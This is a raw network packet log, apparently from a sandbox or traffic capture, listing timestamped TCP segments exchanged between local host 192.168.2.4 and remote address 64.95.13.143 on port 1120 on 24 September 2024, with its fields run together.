Sep 24, 2024 17:46:10.442353010 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.442446947 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.442454100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442466974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442509890 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.442634106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442724943 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442749023 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442761898 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442765951 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.442801952 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.442851067 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442864895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442878962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442892075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.442915916 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.442915916 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.442971945 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.443069935 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.444235086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.444261074 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.444272995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.444329977 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.444411039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.444472075 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.444629908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.444643974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.444746017 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.444773912 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.444787979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.444801092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.444818020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.444840908 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.444901943 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.477763891 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.477782965 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.477794886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.477906942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.477911949 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.477921963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.477976084 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.478061914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478075027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478087902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478100061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478116989 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.478116989 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.478203058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478215933 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478228092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478247881 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478266001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478285074 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.478285074 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.478296995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478307962 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.478332043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478344917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478486061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478540897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478574991 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.478575945 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.478591919 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478626013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478640079 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478766918 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.478785992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478797913 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.478805065 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479024887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479212046 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479223967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479228973 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.479228973 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.479235888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479249001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479263067 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479275942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479305983 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.479305983 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.479334116 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.479347944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479535103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479547977 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479562998 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479666948 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.479666948 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.479686022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479702950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.479830980 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.480221987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.480384111 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.480396032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.480410099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.480422974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.480437040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.480565071 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.480576992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.480591059 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.480602980 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.480604887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.480602980 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.480654955 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.480693102 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.498384953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498402119 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498428106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498440027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498454094 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498516083 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.498517990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498533010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498606920 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498620987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498634100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498663902 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.498663902 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.498663902 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.498718977 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.498740911 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498836040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498847961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498899937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.498908997 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.498914003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499026060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499038935 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499044895 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.499106884 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499120951 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499128103 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.499135017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499149084 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499160051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499315023 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.499315023 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.499315023 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.499609947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499622107 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499634027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499672890 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.499778986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499792099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499804020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499815941 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.499874115 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.499874115 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.534385920 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534410000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534420967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534476042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534487963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534518957 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.534557104 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.534605026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534619093 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534636021 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534647942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534660101 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534672976 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.534701109 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.534871101 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534882069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534895897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.534924984 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.534955025 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.534989119 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535088062 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535121918 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535131931 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535161018 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.535193920 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.535243034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535295010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535356998 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535365105 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.535367966 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535406113 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.535449982 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535460949 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535471916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535482883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535504103 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.535536051 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.535670996 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535681963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535693884 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535715103 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.535924911 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535967112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.535968065 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.535979033 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.536017895 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.536144018 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.536154985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.536165953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.536194086 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.536204100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.536242962 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.574897051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.574913979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.574928999 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.574938059 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575004101 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575018883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575030088 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.575035095 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575047970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575058937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575063944 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.575069904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575083017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575098991 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.575130939 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.575316906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575328112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575337887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575347900 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575366020 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.575371027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575381041 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.575390100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575404882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575413942 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.575417995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575429916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575442076 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575445890 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.575454950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575465918 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575470924 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.575479031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575489044 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575490952 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.575501919 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.575529099 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.575560093 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.576956987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.576967955 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.576978922 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.576991081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.577002048 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.577012062 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.577012062 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.577023983 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.577035904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.577040911 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.577049017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.577059984 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.577068090 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.577070951 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.577081919 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.577090979 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.577091932 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.577102900 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.577112913 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.577114105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.577137947 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.577158928 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.592207909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.592292070 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.592619896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.592631102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.592674971 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.593147039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.593158960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.593168974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.593198061 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.593786955 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.593799114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.593811035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.593851089 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.593866110 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.594997883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.595010042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.595020056 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.595036030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.595053911 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.595079899 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.596597910 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.596615076 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.596626043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.596676111 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.598181009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.598191977 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.598203897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.598253965 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.598253965 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.598432064 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.598443031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.598459005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.598465919 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.598473072 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.598483086 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.598515034 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.599277020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.599287987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.599298954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.599309921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.599337101 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.599351883 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.600862026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.600872993 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.600889921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.600900888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.600910902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.600920916 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.600964069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.600984097 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.602974892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.626970053 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.627052069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.627176046 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.627188921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.627233982 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.627618074 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.627630949 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.627682924 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.628002882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.628015041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.628026962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.628062963 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.629072905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.629085064 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.629095078 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.629133940 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.629163027 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.629565001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.629575968 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.629586935 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.629596949 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.629621029 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.629643917 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.630423069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.630434990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.630445004 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.630476952 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.631335020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.631346941 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.631356955 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.631369114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.631402969 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.631417036 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.631906986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.631918907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.631930113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.631954908 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.631968021 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.632913113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.632925987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.632936001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.632966042 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.667571068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.667702913 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.667720079 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.667732000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.667821884 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.668126106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.668138027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.668148041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.668205976 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.668924093 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.668936014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.668946028 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.668960094 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.668983936 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.669019938 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.669821024 CEST11204973064.95.13.143192.168.2.4
